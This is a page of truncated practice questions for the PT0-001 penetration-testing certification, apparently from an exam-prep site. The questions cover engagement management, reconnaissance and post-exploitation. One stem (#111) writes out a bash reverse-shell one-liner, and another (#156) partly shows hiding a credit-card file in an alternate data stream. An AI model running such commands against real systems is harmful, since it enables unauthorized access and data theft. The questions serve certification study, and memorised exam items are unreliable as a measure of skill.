PT0-001 Practice Questions
248 real PT0-001 exam questions with expert-verified answers and explanations. Page 3 of 5.
- Question #104 (Engagement management)
  After performing a security assessment for a firm, the client was found to have been billed for the time the client's test environment was unavailable. The Client claims to have be...
  Tags: SOW, engagement documentation, billing dispute, legal documents
- Question #105 (Post-exploitation and lateral movement)
  During an internal network penetration test, a tester recovers the NTLM password hash for a user known to have full administrator privileges on a number of target systems. Efforts t...
  Tags: NTLM hash, pass-the-hash, Windows authentication, lateral movement
- Question #106 (Engagement management)
  A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?
  Tags: threat actor modeling, insider threat, disgruntled employee, social engineering
- Question #107 (Attacks and exploits)
  Which of the following types of physical security attacks does a mantrap mitigate?
  Tags: physical security, mantrap, tailgating, access control
- Question #108 (Vulnerability discovery and analysis)
  A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
  Tags: GHOST vulnerability, glibc, vulnerability validation, Linux
- Question #109 (Engagement management)
  For which of the following reasons does a penetration tester need to have a customer's point-of-contact information available at all times? (Select THREE).
  Tags: point of contact, incident escalation, engagement communication, reporting
- Question #110 (Engagement management)
  While engaging clients for a penetration test from highly regulated industries, which of the following is usually the MOST important to the clients from a business perspective?
  Tags: regulated industries, executive summary, risk summary, business perspective
- Question #111 (Post-exploitation and lateral movement)
  A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0>&1 Which of the following additional commands would need to be executed on the...
  Tags: reverse shell, netcat listener, bash, command and control
- Question #112 (Attacks and exploits)
  An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO's login cred...
  Tags: spear phishing, SET, credential harvesting, social engineering
- Question #113 (Attacks and exploits)
  During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to imp...
  Tags: Responder, LLMNR poisoning, NBNS poisoning, credential capture
- Question #114 (Post-exploitation and lateral movement)
  In a physical penetration testing scenario, the penetration tester obtains physical access to a laptop. Which of the following is a potential NEXT step to extract credentials from the device?
  Tags: physical access, LLMNR poisoning, credential extraction, post-exploitation
- Question #115 (Reconnaissance and enumeration)
  A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profiles. For whi...
  Tags: OSINT, social media, dictionary attack, password wordlist
- Question #116 (Reconnaissance and enumeration)
  A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?
  Tags: null sessions, RID cycling, user enumeration, domain controller
- Question #117 (Attacks and exploits)
  Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe is looking for a method that will enable him to enter th...
  Tags: badge cloning, physical security, RFID, access control
- Question #118 (Engagement management)
  A client has voiced concern about the number of companies being breached by remote attackers, who are looking for trade secrets. Which of the following BEST describes the types of adve...
  Tags: APT, threat actors, trade secrets, nation state
- Question #119 (Attacks and exploits)
  Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
  Tags: buffer overflow, CPU registers, stack pointer, exploit development
- Question #120 (Vulnerability discovery and analysis)
  After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to reme...
  Tags: password policy, dictionary attacks, password filters, remediation
- Question #121 (Engagement management)
  A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the application could disclose an SQL table with user acco...
  Tags: SQL disclosure, findings reporting, executive summary, engagement communication
- Question #122 (Engagement management)
  A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant t...
  Tags: scope creep, engagement scope, rules of engagement, web application testing
- Question #123 (Post-exploitation and lateral movement)
  A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?
  Tags: unquoted service paths, privilege escalation, Windows services, local privilege escalation
- Question #124 (Reconnaissance and enumeration)
  A penetration tester has been asked to conduct OS fingerprinting with Nmap using a company-provided text file that contains a list of IP addresses. Which of the following are needed...
  Tags: Nmap, OS fingerprinting, input list, network scanning
- Question #125 (Attacks and exploits)
  Click the exhibit button. A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. W...
  Tags: ARP spoofing, packet analysis, MITM, network attacks
- Question #126 (Vulnerability discovery and analysis)
  Click the exhibit button. Given the Nikto vulnerability scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system?...
  Tags: Nikto, web vulnerability scanning, arbitrary code execution, brute force
- Question #127 (Post-exploitation and lateral movement)
  Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?
  Tags: Metasploit, pivoting, auxiliary modules, network tunneling
- Question #128 (Attacks and exploits)
  A tester has captured a NetNTLMv2 hash using Responder. Which of the following commands will allow the tester to crack the hash using a mask attack?
  Tags: hashcat, NetNTLMv2, password cracking, mask attack
- Question #130 (Reconnaissance and enumeration)
  A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?
  Tags: API testing, Swagger, web application reconnaissance, REST API
- Question #133 (Vulnerability discovery and analysis)
  A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was r...
  Tags: vulnerability severity, CVSS scoring, exploit availability, risk assessment
- Question #134 (Attacks and exploits)
  An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO's login cred...
  Tags: spear phishing, social engineering toolkit, credential harvesting, SET
- Question #135 (Reconnaissance and enumeration)
  A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?
  Tags: Nmap, SSH scanning, port scanning, target list
- Question #136 (Reconnaissance and enumeration)
  A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gatheri...
  Tags: passive reconnaissance, OSINT, IP registry, social media
- Question #137 (Attacks and exploits)
  A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the corre...
  Tags: WPA2-PSK, wireless attacks, deauthentication attack, handshake capture
- Question #138 (Engagement management)
  A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Wh...
  Tags: remediation tracking, pentest findings, risk management, annual assessment
- Question #139 (Engagement management)
  A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?
  Tags: REST API, web service testing, engagement preparation, API documentation
- Question #140 (Reconnaissance and enumeration)
  A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following command: for m in {1..254..1};do ping -c 1 192.168.101.$m;...
  Tags: ping sweep, live host identification, bash scripting, network discovery
- Question #141 (Reconnaissance and enumeration)
  A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the follow...
  Tags: VPN, IKE scan, IPSec, network reconnaissance
- Question #142 (Attacks and exploits)
  Joe, an attacker, intends to transfer funds discreetly from a victim's account to his own. Which of the following URLs can he use to accomplish this attack?
  Tags: CSRF, web application attack, URL manipulation, fund transfer
- Question #143 (Vulnerability discovery and analysis)
  A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding. Which of the following techniques can the penetration...
  Tags: SSL/TLS, certificate validation, DNS resolution, vulnerability scanning
- Question #144 (Reconnaissance and enumeration)
  At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computer names, and office locations. The...
  Tags: OSINT, passive reconnaissance, public data exposure, employee enumeration
- Question #145 (Attacks and exploits)
  Given the following: Which of the following BEST describes the above attack?
  Tags: directory traversal, path traversal, web application attacks, file system
- Question #146 (Reconnaissance and enumeration)
  A penetration tester, who is not on the client's network, is using Nmap to scan the network for hosts that are in scope. The penetration tester is not receiving any response on the...
  Tags: Nmap, host discovery, firewall evasion, -Pn flag
- Question #147 (Post-exploitation and lateral movement)
  Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimika...
  Tags: Mimikatz, LSASS, credential harvesting, privilege escalation
- Question #148 (Engagement management)
  Which of the following is the purpose of an NDA?
  Tags: NDA, confidentiality, legal agreements, engagement documentation
- Question #149 (Vulnerability discovery and analysis)
  A penetration tester has run multiple vulnerability scans against a target system. Which of the following would be unique to a credentialed scan?
  Tags: credentialed scan, vulnerability scanning, scan configuration, authenticated testing
- Question #150 (Reconnaissance and enumeration)
  A penetration tester has been asked to conduct OS fingerprinting with Nmap using a company-provided text file that contains a list of IP addresses. Which of the following are needed to...
  Tags: Nmap, OS fingerprinting, -O flag, -iL flag
- Question #151 (Post-exploitation and lateral movement)
  After establishing a shell on a target system, Joe, a penetration tester, is aware that his actions have not been detected. He now wants to maintain persistent access to the machine...
  Tags: persistence, detection risk, post-exploitation, domain user creation
- Question #152 (Engagement management)
  A consultant is performing a social engineering attack against a client. The consultant was able to collect a number of usernames and passwords using a phishing campaign. The consu...
  Tags: phishing, social engineering, two-factor authentication, remediation recommendations
- Question #153 (Vulnerability discovery and analysis)
  A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
  Tags: GHOST vulnerability, glibc, Linux, vulnerability validation
- Question #154 (Engagement management)
  A company has engaged a penetration tester to perform an assessment for an application that resides in the company's DMZ. Prior to conducting testing, in which of the following sol...
  Tags: IP whitelisting, NIDS, DMZ testing, pre-engagement setup
- Question #155 (Post-exploitation and lateral movement)
  A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?
  Tags: Netcat, reverse shell, listener syntax, command execution
- Question #156 (Post-exploitation and lateral movement)
  During post-exploitation, a tester identifies that only system binaries will pass an egress filter and stores a file with the following command: c: \creditcards.db>c:\winit\system32...
  Tags: alternate data streams, NTFS, data hiding, egress filter evasion